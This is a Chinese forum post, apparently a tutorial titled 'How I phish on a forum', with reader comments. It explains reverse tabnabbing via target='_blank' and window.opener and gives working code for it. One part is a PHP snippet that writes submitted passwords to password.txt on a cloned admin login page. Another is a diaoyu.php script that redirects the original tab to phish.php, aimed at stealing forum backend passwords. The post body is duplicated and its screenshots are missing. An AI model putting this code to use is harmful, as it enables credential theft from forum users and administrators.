看我如何在论坛进行钓鱼
当用户点击了某个网站中带有target=”_blank”属性的超链接后,浏览器会单独新建一个标签页来显示该链接所指向的内容。但是请注意,在这一瞬间,浏览器会允许新建的标签页通过一个名为“window.opener”的浏览器API来与之前的网页进行短暂通信。
参考链接:http://www.freebuf.com/vuls/113634.html
比如我要钓鱼一个论坛的后台密码,我先把他的html保存下载,然后我添加几行代码,示例代码如下:
$content = $_POST['name']
file_put_contents('password.txt',$content);
打开以后是这样的
然后我再创建个diaoyu.php文件,事例代码如下:
<meta http-equiv="refresh" content="1;url= https://pan.baidu.com/s/1eRFAiUQ">
<script>
if(window.opener){
window.opener.location = "http://127.0.0.1/phish.php";
}
</script>
然后比如我发个帖,发完是这样的
点击以后是新开标签页是调到了百度盘,如图
但是刚刚的标签页跳到了phish.php页面,
然后不小心输入密码以后,
过程
参考链接:http://www.freebuf.com/vuls/113634.html
比如我要钓鱼一个论坛的后台密码,我先把他的html保存下载,然后我添加几行代码,示例代码如下:
$content = $_POST['name']
file_put_contents('password.txt',$content);
打开以后是这样的
然后我再创建个diaoyu.php文件,事例代码如下:
<meta http-equiv="refresh" content="1;url= https://pan.baidu.com/s/1eRFAiUQ">
<script>
if(window.opener){
window.opener.location = "http://127.0.0.1/phish.php";
}
</script>
然后比如我发个帖,发完是这样的
点击以后是新开标签页是调到了百度盘,如图
但是刚刚的标签页跳到了phish.php页面,
然后不小心输入密码以后,
过程
评论52次
感觉能钓鱼到普通论坛用户,毕竟不懂。。。稍微有点安全意识的管理员看到莫名其妙的登录框应该不会冒然登录
主要还要吓到很多用户,
这个钓鱼的前提是已经拿下了整个站吧,那钓鱼不是没有意义了吗?
对啊 我也是这样感觉的
学xi了。。这个技巧牛!
感觉似乎很厉害呢
这个不是我以前发的文章吗。。翻录了一下
好淫荡= =
url会暴露的啊,而且如果能插入脚本的话,为什么不直接插入偷cookie的脚本
这样中招的管理员。。。楼主说下 有成功的吗?。。。
你已成功把我掉进来了
学xi下!
增加一个 根据来源判断 跳转不同的钓鱼页。 作用会很大
jumbonojj ,现在的钓鱼手段越来越多了。以后干脆直接就开着F12查看网络吧。不然真的是没有什么监控手段了
话说这个后台可以用那种网站克隆工具克隆下来吗
图片都碎光了么。
虽然很早爆出来,但然后可以有很多利用。
学xi了。。。
马可一下,说不定以后有用,设计点复杂的情景应该还不错
正如@Mapconf所发文章中某个曾经很火的白帽子社区,都有白帽子中招,更何况安全意识不强的普通网民。
感觉比较一般,太容易发现了